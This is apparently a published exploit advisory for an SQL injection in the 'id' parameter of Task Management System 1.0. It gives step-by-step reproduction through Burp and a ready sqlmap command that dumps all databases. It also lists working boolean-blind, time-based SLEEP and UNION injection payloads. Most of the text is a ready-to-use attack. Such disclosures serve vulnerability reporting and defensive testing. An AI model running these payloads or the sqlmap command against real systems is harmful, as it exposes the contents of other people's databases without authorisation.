# Exploit Title: Task Management System 1.0 - 'id' SQL Injection  
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)  
# Date: 2020-12-08  
# Google Dork: N/A  
# Vendor Homepage:  
# Software Link:  
# Affected Version: Version 1  
# Category: Web Application  
# Tested on: Parrot OS  
Step 1. Log into application with credentials  
Step 2. Click on Projects  
Step 3. Select View Projects  
Step 4. Choose any project, click on action and select view  
Step 5. Capture the request of the "page=view_project&id=" page in burpsute  
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs "  
Step 7. This will inject successfully and you will have an information disclosure of all databases contents  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: page=view_project&id=3 AND 5169=5169  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH)  
Type: UNION query  
Title: Generic UNION query (NULL) - 9 columns  
Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- -